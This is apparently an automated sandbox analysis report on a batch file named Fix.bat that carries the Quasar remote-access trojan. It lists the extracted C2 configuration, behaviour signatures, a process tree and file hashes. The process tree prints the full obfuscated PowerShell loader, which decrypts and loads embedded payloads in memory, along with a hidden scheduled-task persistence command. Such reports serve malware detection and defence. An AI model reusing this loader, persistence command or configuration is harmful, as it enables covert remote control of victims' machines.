Analysis
- max time kernel: 300s
- max time network: 281s
- platform: windows11-21h2_x64
- resource: win11-20240508-en
- resource tags: arch:x64, arch:x86, image:win11-20240508-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 14-05-2024 21:43

Static task: static1

Behavioral task: behavioral1
- Sample: Fix.bat
- Resource: win10-20240404-en

Behavioral task: behavioral2
- Sample: Fix.bat
- Resource: win10v2004-20240508-en
General
- Target: Fix.bat
- Size: 513KB
- MD5: a84be587721ab2558489178539f283e6
- SHA1: 5a48f5c98f7366d13f371965c19c98a5754bd90b
- SHA256: 32cfb4e83f43787c79ef6a15bef53137a0e9a6d6d558ef1532993fb8369cc8fd
- SHA512: c1c4e35246c39f3e710cbd261187c7968d75c65fd1c4b96f6caa6ddec1484ca42f2431f4184ec0061cd7b2e0d3478db993f88a043106f0ce9d7ae859c3f5f931
- SSDEEP: 12288:PlknMJu9SVaydjmxZ8yeMfd0dwOk6VWX0sQFjh80wszzd0VmONTlomwcuz:q6uidS6MdIdVWksQFjS0bzzOY+oX5z
Malware Config
Extracted
- Family: quasar
- Version: 3.1.5
- Botnet: SLAVE
- C2: even-lemon.gl.at.ply.gg:33587
- Mutex: $Sxr-AidubAN29rBfWYM23w
- encryption_key: GNF1G2eu7MrbS69M7a4f
- install_name: Client.exe
- log_directory: $SXR-LOGS
- reconnect_delay: 3000
- startup_key: Quasar Client Startup
- subdirectory: SubDir
Signatures
- Quasar payload (1 IoC)
  Processes:
  resource | yara_rule
  behavioral3/memory/3720-75-0x0000000007AC0000-0x0000000007B2C000-memory.dmp | family_quasar
- Suspicious use of NtCreateUserProcessOtherParentProcess (2 IoCs)
  Processes: powershell.EXE, powershell.EXE
  description | pid | process | target process
  PID 1876 created 648 | 1876 | powershell.EXE | winlogon.exe
  PID 5068 created 648 | 5068 | powershell.EXE | winlogon.exe
- Blocklisted process makes network request (7 IoCs)
  Processes: powershell.exe
  flow | pid | process
  2 | 3720 | powershell.exe
  5 | 3720 | powershell.exe
  6 | 3720 | powershell.exe
  7 | 3720 | powershell.exe
  8 | 3720 | powershell.exe
  9 | 3720 | powershell.exe
  10 | 3720 | powershell.exe
- Command and Scripting Interpreter: PowerShell (1 TTP, 3 IoCs)
  Run PowerShell and hide display window.
  Processes: powershell.exe, powershell.exe, powershell.exe
  pid | process
  4496 | powershell.exe
  1264 | powershell.exe
  3720 | powershell.exe
- Executes dropped EXE (2 IoCs)
  Processes: install.exe, install.exe
  pid | process
  4860 | install.exe
  5012 | install.exe
- Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes:
  flow | ioc
  1 | ip-api.com
  4 | api.ipify.org
- Drops file in System32 directory (15 IoCs)
  Processes: OfficeClickToRun.exe, svchost.exe, powershell.EXE, svchost.exe, powershell.EXE, svchost.exe, DllHost.exe
  description | ioc | process
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | OfficeClickToRun.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | OfficeClickToRun.exe
  File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
  File opened for modification | C:\Windows\System32\Tasks\$77svc64 | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
  File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | svchost.exe
  File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | OfficeClickToRun.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | OfficeClickToRun.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.chk | DllHost.exe
- Suspicious use of SetThreadContext (2 IoCs)
  Processes: powershell.EXE, powershell.EXE
  description | pid | process | target process
  PID 1876 set thread context of 3564 | 1876 | powershell.EXE | dllhost.exe
  PID 5068 set thread context of 1168 | 5068 | powershell.EXE | dllhost.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Modifies data under HKEY_USERS (64 IoCs)
  Processes:
  OfficeClickToRun.exe, powershell.EXE, powershell.EXE, svchost.exe
- Modifies registry class (1 IoC)
  Processes: powershell.exe
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings | powershell.exe
- Runs ping.exe (1 TTP, 1 IoC)
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes:
  powershell.exe, powershell.exe, powershell.exe, powershell.EXE, dllhost.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes:
  powershell.exe, powershell.exe
- Suspicious use of SetWindowsHookEx (1 IoC)
  Processes: powershell.exe
  pid | process
  3720 | powershell.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes: cmd.exe, powershell.exe, WScript.exe, cmd.exe, powershell.exe, powershell.EXE, dllhost.exe
  description | pid | process | target process
  PID 1280 wrote to memory of 4496 | 1280 | cmd.exe | powershell.exe
  PID 1280 wrote to memory of 4496 | 1280 | cmd.exe | powershell.exe
  PID 1280 wrote to memory of 4496 | 1280 | cmd.exe | powershell.exe
  PID 4496 wrote to memory of 1264 | 4496 | powershell.exe | powershell.exe
  PID 4496 wrote to memory of 1264 | 4496 | powershell.exe | powershell.exe
  PID 4496 wrote to memory of 1264 | 4496 | powershell.exe | powershell.exe
  PID 4496 wrote to memory of 5116 | 4496 | powershell.exe | WScript.exe
  PID 4496 wrote to memory of 5116 | 4496 | powershell.exe | WScript.exe
  PID 4496 wrote to memory of 5116 | 4496 | powershell.exe | WScript.exe
  PID 5116 wrote to memory of 3156 | 5116 | WScript.exe | cmd.exe
  PID 5116 wrote to memory of 3156 | 5116 | WScript.exe | cmd.exe
  PID 5116 wrote to memory of 3156 | 5116 | WScript.exe | cmd.exe
  PID 3156 wrote to memory of 3720 | 3156 | cmd.exe | powershell.exe
  PID 3156 wrote to memory of 3720 | 3156 | cmd.exe | powershell.exe
  PID 3156 wrote to memory of 3720 | 3156 | cmd.exe | powershell.exe
  PID 3720 wrote to memory of 4860 | 3720 | powershell.exe | install.exe
  PID 3720 wrote to memory of 4860 | 3720 | powershell.exe | install.exe
  PID 3720 wrote to memory of 4860 | 3720 | powershell.exe | install.exe
  PID 1876 wrote to memory of 3564 | 1876 | powershell.EXE | dllhost.exe
  PID 1876 wrote to memory of 3564 | 1876 | powershell.EXE | dllhost.exe
  PID 1876 wrote to memory of 3564 | 1876 | powershell.EXE | dllhost.exe
  PID 1876 wrote to memory of 3564 | 1876 | powershell.EXE | dllhost.exe
  PID 1876 wrote to memory of 3564 | 1876 | powershell.EXE | dllhost.exe
  PID 1876 wrote to memory of 3564 | 1876 | powershell.EXE | dllhost.exe
  PID 1876 wrote to memory of 3564 | 1876 | powershell.EXE | dllhost.exe
  PID 1876 wrote to memory of 3564 | 1876 | powershell.EXE | dllhost.exe
  PID 3564 wrote to memory of 648 | 3564 | dllhost.exe | winlogon.exe
  PID 3564 wrote to memory of 704 | 3564 | dllhost.exe | lsass.exe
  PID 3564 wrote to memory of 996 | 3564 | dllhost.exe | svchost.exe
  PID 3564 wrote to memory of 548 | 3564 | dllhost.exe | dwm.exe
  PID 3564 wrote to memory of 772 | 3564 | dllhost.exe | svchost.exe
  PID 3564 wrote to memory of 740 | 3564 | dllhost.exe | svchost.exe
  PID 3564 wrote to memory of 1072 | 3564 | dllhost.exe | svchost.exe
  PID 3564 wrote to memory of 1092 | 3564 | dllhost.exe | svchost.exe
  PID 3564 wrote to memory of 1136 | 3564 | dllhost.exe | svchost.exe
  PID 3564 wrote to memory of 1196 | 3564 | dllhost.exe | svchost.exe
  PID 3564 wrote to memory of 1244 | 3564 | dllhost.exe | svchost.exe
  PID 3564 wrote to memory of 1320 | 3564 | dllhost.exe | svchost.exe
  PID 3564 wrote to memory of 1408 | 3564 | dllhost.exe | svchost.exe
  PID 3564 wrote to memory of 1476 | 3564 | dllhost.exe | svchost.exe
  PID 3564 wrote to memory of 1520 | 3564 | dllhost.exe | svchost.exe
  PID 3564 wrote to memory of 1628 | 3564 | dllhost.exe | svchost.exe
  PID 3564 wrote to memory of 1648 | 3564 | dllhost.exe | svchost.exe
  PID 3564 wrote to memory of 1672 | 3564 | dllhost.exe | svchost.exe
  PID 3564 wrote to memory of 1736 | 3564 | dllhost.exe | svchost.exe
  PID 3564 wrote to memory of 1764 | 3564 | dllhost.exe | svchost.exe
  PID 3564 wrote to memory of 1864 | 3564 | dllhost.exe | svchost.exe
  PID 3564 wrote to memory of 1884 | 3564 | dllhost.exe | svchost.exe
  PID 3564 wrote to memory of 1952 | 3564 | dllhost.exe | svchost.exe
  PID 3564 wrote to memory of 1960 | 3564 | dllhost.exe | svchost.exe
  PID 3564 wrote to memory of 1152 | 3564 | dllhost.exe | svchost.exe
  PID 3564 wrote to memory of 2068 | 3564 | dllhost.exe | svchost.exe
  PID 3564 wrote to memory of 2128 | 3564 | dllhost.exe | spoolsv.exe
  PID 3564 wrote to memory of 2276 | 3564 | dllhost.exe | svchost.exe
  PID 3564 wrote to memory of 2348 | 3564 | dllhost.exe | svchost.exe
  PID 3564 wrote to memory of 2472 | 3564 | dllhost.exe | svchost.exe
  PID 3564 wrote to memory of 2480 | 3564 | dllhost.exe | svchost.exe
  PID 3564 wrote to memory of 2524 | 3564 | dllhost.exe | svchost.exe
  PID 3564 wrote to memory of 2576 | 3564 | dllhost.exe | sysmon.exe
  PID 3564 wrote to memory of 2584 | 3564 | dllhost.exe | svchost.exe
  PID 3564 wrote to memory of 2596 | 3564 | dllhost.exe | svchost.exe
  PID 3564 wrote to memory of 2684 | 3564 | dllhost.exe | svchost.exe
  PID 3564 wrote to memory of 2704 | 3564 | dllhost.exe | svchost.exe
  PID 3564 wrote to memory of 2772 | 3564 | dllhost.exe | sihost.exe
Processes (image | command line; indentation shows tree depth, signatures listed under each process)
- C:\Windows\system32\winlogon.exe | winlogon.exe
  - C:\Windows\system32\dwm.exe | "dwm.exe"
  - C:\Windows\System32\dllhost.exe | C:\Windows\System32\dllhost.exe /Processid:{7dcccc0d-d4f6-4a3a-93d0-ba0a8a12dbb4}
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
  - C:\Windows\System32\dllhost.exe | C:\Windows\System32\dllhost.exe /Processid:{f56ec715-b702-4eea-b848-10c1df4d903f}
- C:\Windows\system32\lsass.exe | C:\Windows\system32\lsass.exe
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
- C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
- C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
    Drops file in System32 directory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (obfuscated inline script)
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (obfuscated inline script)
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe (depth 3)
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
-
C:\Windows\System32\svchost.exe (depth 1)
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
-
C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
-
C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
-
C:\Windows\System32\svchost.exe (depth 1)
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
-
C:\Windows\system32\sihost.exe (depth 2)
sihost.exe
-
C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
-
C:\Windows\System32\svchost.exe (depth 1)
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
-
C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k NetworkService -p
-
C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
-
C:\Windows\System32\svchost.exe (depth 1)
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
-
C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
-
C:\Windows\System32\svchost.exe (depth 1)
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
-
C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
-
C:\Windows\System32\svchost.exe (depth 1)
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
-
C:\Windows\System32\svchost.exe (depth 1)
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
-
C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
-
C:\Windows\System32\spoolsv.exe (depth 1)
C:\Windows\System32\spoolsv.exe
-
C:\Windows\System32\svchost.exe (depth 1)
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
-
C:\Windows\System32\svchost.exe (depth 1)
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
-
C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
-
C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
-
C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k NetworkService -p
- Drops file in System32 directory
-
C:\Windows\sysmon.exe (depth 1)
C:\Windows\sysmon.exe
-
C:\Windows\System32\svchost.exe (depth 1)
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
-
C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
-
C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
-
C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
-
C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
-
C:\Windows\system32\wbem\unsecapp.exe (depth 1)
C:\Windows\system32\wbem\unsecapp.exe -Embedding
-
C:\Windows\Explorer.EXE (depth 1)
C:\Windows\Explorer.EXE
-
C:\Windows\system32\cmd.exe (depth 2)
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Fix.bat"
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('V4Hy8emI3mM56PZmDPionZmQDoSVLTkUh0buDVVDWdM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S+QbBB6/ak2YmQDkQn0LyA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $uBtlQ=New-Object System.IO.MemoryStream(,$param_var); $FyNRj=New-Object System.IO.MemoryStream; $GWKHD=New-Object System.IO.Compression.GZipStream($uBtlQ, [IO.Compression.CompressionMode]::Decompress); $GWKHD.CopyTo($FyNRj); $GWKHD.Dispose(); $uBtlQ.Dispose(); $FyNRj.Dispose(); $FyNRj.ToArray();}function execute_function($param_var,$param2_var){ $pANIv=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mSXDz=$pANIv.EntryPoint; $mSXDz.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Fix.bat';$eOdAN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Fix.bat').Split([Environment]::NewLine);foreach ($lhvkI in $eOdAN) { if ($lhvkI.StartsWith(':: ')) { $JmDDg=$lhvkI.Substring(3); break; }}$payloads_var=[string[]]$JmDDg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var 
(,[string[]] (''));
(depth 3)
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 4)
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_937_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_937.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WScript.exe (depth 4)
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_937.vbs"
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe (depth 5)
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_937.bat" "
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe (depth 6)
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('V4Hy8emI3mM56PZmDPionZmQDoSVLTkUh0buDVVDWdM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S+QbBB6/ak2YmQDkQn0LyA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $uBtlQ=New-Object System.IO.MemoryStream(,$param_var); $FyNRj=New-Object System.IO.MemoryStream; $GWKHD=New-Object System.IO.Compression.GZipStream($uBtlQ, [IO.Compression.CompressionMode]::Decompress); $GWKHD.CopyTo($FyNRj); $GWKHD.Dispose(); $uBtlQ.Dispose(); $FyNRj.Dispose(); $FyNRj.ToArray();}function execute_function($param_var,$param2_var){ $pANIv=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mSXDz=$pANIv.EntryPoint; $mSXDz.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_937.bat';$eOdAN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_937.bat').Split([Environment]::NewLine);foreach ($lhvkI in $eOdAN) { if ($lhvkI.StartsWith(':: ')) { $JmDDg=$lhvkI.Substring(3); break; }}$payloads_var=[string[]]$JmDDg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function 
$payload2_var (,[string[]] (''));
(depth 6)
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\install.exe (depth 7)
"C:\Users\Admin\AppData\Local\Temp\install.exe"
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe (depth 7)
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7usMH6hRYQjS.bat" "
-
C:\Windows\System32\Conhost.exe (depth 8)
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
-
C:\Windows\SysWOW64\chcp.com (depth 8)
chcp 65001
-
C:\Windows\SysWOW64\PING.EXE (depth 8)
ping -n 10 localhost
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\install.exe (depth 7)
"C:\Users\Admin\AppData\Local\Temp\install.exe"
- Executes dropped EXE
-
C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
-
C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
-
C:\Windows\System32\RuntimeBroker.exe (depth 1)
C:\Windows\System32\RuntimeBroker.exe -Embedding
-
C:\Windows\System32\RuntimeBroker.exe (depth 1)
C:\Windows\System32\RuntimeBroker.exe -Embedding
-
C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
-
C:\Windows\system32\DllHost.exe (depth 1)
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
-
C:\Windows\system32\DllHost.exe (depth 1)
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
-
C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
-
C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
-
C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
-
C:\Windows\System32\svchost.exe (depth 1)
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
-
C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe (depth 1)
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SppExtComObj.exe (depth 1)
C:\Windows\system32\SppExtComObj.exe -Embedding
-
C:\Windows\System32\svchost.exe (depth 1)
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
-
C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
-
C:\Windows\system32\DllHost.exe (depth 1)
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
- Drops file in System32 directory
-
C:\Windows\sysWOW64\wbem\wmiprvse.exe (depth 1)
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
-
C:\Windows\system32\wbem\wmiprvse.exe (depth 1)
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize 2KB
MD5 5dc9a9599fb11ee70f9164d8fea15abf
SHA1 85faf41a206f3fa8b469609333558cf817df2cda
SHA256 3f033142ed64a5d1e1e19d11a710e22a32827e98922769497ed6bd6e452e44de
SHA512 499407006c53a5f8e5b2b00dab734613762e66a9080504ab50d21e4c8a32b75d7308ccaa0cecfbeb7058044448a40912715da1f02ec72994596d567b515dcfca
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 17KB
MD5 1671cda496fb05c15e99fbc7cce9c117
SHA1 009e18567d5cba84b0274969556525a4423e74b2
SHA256 2ab5c4448716de8b7649fb7961536c5aa0a2c89105ecef9a413dc060644dfa59
SHA512 c71053fdd3cd73905cf7b8ae9b2fd24ef8832afee770b162d55244eaef2da98d3c8a76630b961e6d83ec4d0b737a7fa16c094077571e1775b8386a97ee2b6501
-
C:\Users\Admin\AppData\Local\Temp\7usMH6hRYQjS.bat
Filesize 276B
MD5 caa3a2ed2f93963692d29b4924b107af
SHA1 8248bb3ed5e11295303987f0a9dc9bff059d65df
SHA256 5d6cecdb92dec3252e9237e253448b064f4e1a20b143be8f5dc2a33ca1eea0db
SHA512 446dceff78ddb792aec5239cc7bf9d4de3afe6874eb550f4e3c541d254d1007376e38e2879b14110dc295d811dea1de96e14bc74057cf74c0e0544a8b606d26e
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e0w35wpu.wg5.ps1
Filesize 60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\install.exe
Filesize 162KB
MD5 152e3f07bbaf88fb8b097ba05a60df6e
SHA1 c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256 a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA512 2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Roaming\$SXR-LOGS\05-14-~1
Filesize 224B
MD5 0e56f16dad794e44f6100ab42ebf6767
SHA1 f8429757596b51ffafac9d842be2a9d4036683c1
SHA256 6ca8c2677cf64ea367acc10e9ac608bfc8e232d8a7629fec17b5b44b2427d554
